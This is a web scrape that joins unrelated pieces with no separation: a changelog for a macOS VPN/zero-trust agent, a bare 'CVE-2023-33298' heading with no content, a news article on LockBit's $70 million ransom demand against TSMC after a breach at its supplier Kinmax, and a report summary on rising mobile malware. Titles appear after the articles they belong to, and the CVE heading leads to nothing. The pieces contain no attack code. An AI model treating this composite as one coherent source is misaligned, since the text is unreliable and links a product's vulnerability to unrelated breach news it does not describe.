*   P81-5026 - Remove "contact support" suggestion when failing DPC
*   P81-5034 - Rename "diagnose issues" button
*   P81-4699 - Compatibility with MacOS 12.0 Monterey

**MacOS agent 7.0.3.28**

Fixed issues:

*   P81-3293 - Added latency measurements BI events
*   P81-3312 - Fixed device register issue caused by UDID non-escaping

**MacOS agent 7.0.2.21**

Fixed issues:

*   P81-1995 — Device posture check says that disk is not encrypted when it actually is encrypted
*   P81-2021 — Incorrect VPN status on Home screen if Start Minimized=ON and VPN has connected automatically
*   P81-2532 — Agent stuck on reconnecting
*   P81-3111 — DPC failed for all the rules that should pass
*   P81-3179 — App hanging during TWN check processing

**MacOS agent 7.0.2.19**

Fixed issues:

*   P81-2680 — Trusted Wired Networks - Agent user still needs to enter code on Quit/sign out while connected to TWN
*   P81-2198 — User still needs to enter code on Quit/Sign Out while on TWNP81-2198
*   P81-2633 — The Always On Not restored 0n turning Netwotk's toggle if Network above in list is Disabled
*   P81-2231 — Attempt to connect to the VPN is made on setting AlwaysOn by user
*   P81-2199 — No "Connected to Trusted Network" badge on Home screen when computer on TWN
*   P81-2198 — User still needs to enter code on Quit/Sign Out while on TWN
*   P81-2215 — The app connected to VPN on user setting AlwaysOn=ON while connected to TWN
*   P81-2550 — Show appropriate text when hovering over the "Connected to Trusted Network" badge
*   P81-2798 — MacOS P81 DPC: Condition "AND" for "Process Running" doesn't work

**MacOS 7.0.1.12**

*   Silent upgrade feature imlemented

**MacOS 7.0.1.7**

*   Fixed issue when agent app pops up with every ZTA change — P81-1117, P81-1115
*   Fixed wrong Device Name documented in Device Activity — P81-1364
*   Fixed Internal IP Not Defined issue, when VPN get connected — P81-1347
*   Moved Snowplow session cache file outside of the user’s Documents folder — P81-937

**MacOS 7.0.1.6****New features:**

*   Device Posture Check feature implemented

**Resolved Issues:**

*   Fixed app crash issue — P81-726
*   Fixed app re-connect issue when losing WiFi — P81-906
*   Fixed Run on StartUp issue — P81-914
*   Fixed Sign Out” and “Quit” option from doesn’t work if app is not in foreground — P81-1027
*   Fixed app re-login when DPC check has failed — P81-1452
*   Fixed Disconnect/Connect notifications showing — P81-1110
*   Fixed high CPU consumption issue when the app is in background — P81-438
*   Fixed SDP socket re-connect issue after sleep-mode

**MacOS 7.0.0 (7):****Bug fixes:**

*   Application complete re-design, Main view, Settings page, Support page, OnBoarding page
*   Implemented new login flow using default browser with SSO support
*   Implemented accessToken token rotation before performing Logout call -- #MAC-1056
*   Added timeout for LoginSucceeded event -- #MAC-1075
*   Added full username showing inside of the Main view (if it’s available) -- #MAC-1083
*   Added support ticket number for the user if it’s available from Troubleshooting -- #MAC-1074
*   Change user’s email address fetching from JWT to channel.OnUpdated data payload -- #MAC-1066
*   Fixed Connection/Reconnection initiated from Connect on Launch can’t be interrupted -- #MAC-1079
*   Fixed Hide Automatic Location from Icon/Dock menus -- #MAC-1086
*   Fixed issue when Admin can’t enforce upgrade to the latest version -- #MAC-942
*   Disable KillSwitch by default for AlwaysON -- #MAC-1081
*   Fixed Sleep/awake re-connect issue -- #MAC-1061
*   Fixed Disconnect button non-responsiveness when agent connecting/reconnecting -- #MAC-1078
*   Fixed expand/collapse Shared Networks issue, when hover stopped to work -- #MAC-1062
*   Fixed issues when “Change Network” button displayed incorrectly when “Upgrade Application” is enforced -- #MAC-1111
*   Added BI events sending support
*   Added osVersion as a part of channel.open payload
*   Implemented automated Troubleshooting script, now avg processing time is ~1 min -- #MAC-1093
*   Fixed “Sign Out” and “Quit” options from notification area context menu when app is in background mode -- #MAC-1100, #MAC-1099
*   Fixed “Automatic Location” network option -- #MAC-1096
*   Added tooltips for SignOut / Exit Settings buttons, Main + OnBoarding windows appear at the same time -- #MAC-1088
*   Fixed “Automatic Location” network option -- #MAC-1096
*   Fixed UI blinking when switching between Home tab and any other -- #MAC-1073
*   Fix network selection logic -- #MAC-1087

Was this article helpful?

CVE-2023-33298: MacOS - Agent

The group has given one of Apple's biggest semiconductor suppliers until Aug. 6 to pay $70 million or risk having its data and "points of entry" to its network publicly leaked.

Taiwan Semiconductor Manufacturing Company (TSMC) — one of Apple's biggest semiconductor suppliers — on Friday blamed a third-party IT hardware supplier for a data breach that has exposed the company to a $70 million ransom demand from the LockBit ransomware group.

In an emailed statement to Dark Reading, TSMC confirmed multiple reports about the security incident but did not say what data specifically LockBit actors might have accessed from its systems and is holding for ransom. The statement, however, described the incident as not affecting any of TSMC's business or customer information.

**Third-Party Breach**

"TSMC has recently been aware that one of our IT hardware suppliers experienced a cybersecurity incident, which led to the leak of information pertinent to server initial setup and configuration," the statement noted. It identified the third-party supplier as Kinmax Technology, a Hsinchu, Taiwan- based systems integrator that claims to work with numerous other major technology players, including Aruba, Checkpoint, Cisco, Citrix, Fortinet, Hewlett-Packard Enterprise, Microsoft, and VMware. It's unclear if any other customers are affected by the attack.

Meanwhile, a subgroup within the LockBit operation that calls itself the National Hazard Agency claimed that it has given TSMC up to Aug. 6 to pay the multimillion-dollar ransom or risk having the company's stolen data publicly leaked. The threat actor claimed that it would also publish what it described as "points of entry" into TSMC's network as well as passwords and login information for gaining access to it. The latter is catnip to cyberattackers given that TSMC is a juicy target: It reported a net income of some $34 billion on consolidated revenue of $75.8 billion in 2022.

TSMC said it had conducted a review of its hardware components and security configurations used in its systems, after Kinmax reported the incident, to determine the scope of the breach. "After the incident, TSMC has immediately terminated its data exchange with this supplier in accordance with the company’s security protocols and standard operating procedures," the statement noted. The chipmaker said it remained committed to enhancing security awareness among its suppliers and in ensuring they complied with the company's security requirements.

**IT Supplier Downplays Incident**

Kinmax said it discovered the intrusion into its systems on June 29. The company described the attacker as having breached the company's engineering test environment and accessing system installation preparation information. 

"This is the system installation environment prepared for customers," Kinmax said in a statement on the incident. "The captured content is parameter information such as installation configuration files."

The statement appeared to downplay the seriousness of the breach. "The \[breached\] information has nothing to do with the actual application of the customer. It is only the basic setting at the time of shipment," the company said. The statement did not identify TSMC by name. But it somewhat bewilderingly claimed that the chipmaker (or others) had not experienced any negative consequences. "At present, no damage has been caused to the customer and the customer has not been hacked by it," the June 30 statement noted.

In the statement shared with Dark Reading, the systems integrator expressed regret over the incident. "We would like to express our sincere apologies to the affected customers, as the leaked information contained their names which may have caused some inconvenience. The company has thoroughly investigated this incident and implemented enhanced security measures to prevent such incidents from occurring in the future," the Kinmax statement said.

TSMC is the latest among a rapidly growing number of organizations that has experienced a data breach via a third-party compromise. News of the company's predicament comes even as reports continue to pour in about numerous organizations falling victim to the Cl0p ransomware gang because of a vulnerability in Progress Software's widely used MOVEit Transfer app. Victims of that campaign so far include biopharma giant AbbVie, Siemens, Schneider Electric, the University of California at Los Angles (UCLA).

Such breaches have brought IT supply chain security into sharp focus in recent years and made it a top priority in the Biden administration's May 2021 cybersecurity executive order.

Chip Giant TSMC Blames $70M LockBit Breach on IT Hardware Supplier

The number of malware samples is up as attackers aim to compromise users where they work and play: Their smartphones.

Attackers are increasingly targeting users through their mobile devices, attacking vulnerabilities in services that are built into applications and mounting increasing numbers of SMS phishing attacks.

That's according to mobile security firm Zimperium's 2023 "Global Mobile Threat Report," which also found that the average number of unique mobile malware samples grew 51% in 2022, totaling an average of 77,000 unique malware samples found every month. About a quarter of application samples submitted to public repositories — 23% of Android apps and 24% of iOS apps — were malicious, according to data in the report.

In total, that all contributed to the number of compromised devices nearly tripling (up 187%) in the time period, because the tactics are working: The company saw an average of four malicious phishing links clicked per device, for instance.

The trend comes as companies and their workers rely increasingly on mobile devices, with a majority of firms seeing more workers (58%) using mobile devices for business than in 2021 and most users (59%) doing more work with their mobile devices, according to the 2022 "Verizon Mobile Security Index" report. 

"Businesses and users need to mostly be concerned about mobile phishing and spyware today, and mobile ransomware will become increasingly concerning in the near future," says JT Keating, senior vice president of strategic initiatives at Zimperium. 

**Android, iOS Devices See Different Levels of Cyber Threats**

About 80% of phishing sites specifically target mobile devices with content suited to those platforms, Zimperium stated in its 2023 "Global Mobile Threat Report." But, as has been the case for many years, the Android platform tends to attract more threats. One of the reasons for that could be that the Android operating system has seen between about 500 and 900 vulnerabilities disclosed per year that threat actors can target; iOS meanwhile saw a little more than 300 vulnerabilities in five of the last eight years, according to Zimperium. 

Another reason that Android is a bigger target? App development mistakes. The firm found that there are more mistakes made in the process of developing apps when it comes to Android, particularly when it comes to how those apps interact with cloud storage instances. Only about 2% of iOS applications access unprotected cloud instances, while 10% of Android apps do so. These include database instances accessed through Google Firebase and Cloud Platform, Amazon Simple Storage Service (S3), and Microsoft Azure Cloud Storage, according to Zimperium's report. As a corollary, developers also tend to access the same poor resources, too: Only 1% of unprotected cloud instances accounted for 60% of applications at risk, the company said.

Georgy Kucherin, a security expert at Kaspersky's Global Research and Analysis Team (GReAT), says his firm's research bears out the finding that Android attracts more overall threats, though he notes that when it comes to spyware the targeting is evenly split between the two ecosystems; the recent Triangulation cyber espionage campaign for instance shows the value in targeting the iOS platform.

"Mobile users should worry about both cybercrime threats and nation-state espionage, \[but\] it is correct to say that Android faces more general threats," he says. "Android devices are more likely to become infected with malware distributed by cybercriminals. As for top-notch espionage spyware, both iOS and Android are vulnerable to it."

The lack of jailbreaking utilities for the latest version of iOS is also lowering the number of attacks for that platform, according to Zimperium. Jailbreaking allows users to add non-Apple-sanctioned software to their mobile devices, but it also removes significant security guardrails in the process. 

**Threats Up, or Leveling Off?**

In terms of the types of mobile malware that's circulating out there, Kaspersky saw fewer mobile malware installers and less ransomware in the past year, but more banking Trojans, it stated in "The Mobile Malware Threat Landscape in 2022" report.

"Cybercriminals are still working on improving both malware functionality and spread vectors," according to the report. "Malware is increasingly spreading through legitimate channels, such as official marketplaces and ads in popular apps. This is true for both scam apps and dangerous mobile banking malware."

To put all of this into perspective, it should be noted that traditional computing platforms still attract the lion's share of the cybercrime pie. Kaspersky, for example, blocked more than 20 million malicious installers, spyware, and adware attacks on mobile devices over the last four quarters, but blocked more than 20 times that number against more common work platforms, such as Windows. However, the mobile threat vector is not as well protected. 

"In most cases, mobile devices represent a significant, unaddressed attack surface for enterprises," Zimperium's Keating says. "No matter if they are corporate-owned or part of a BYOD strategy, the need to implement appropriate security controls, and educate end-users about potential threats, is critical."

Tag

#apple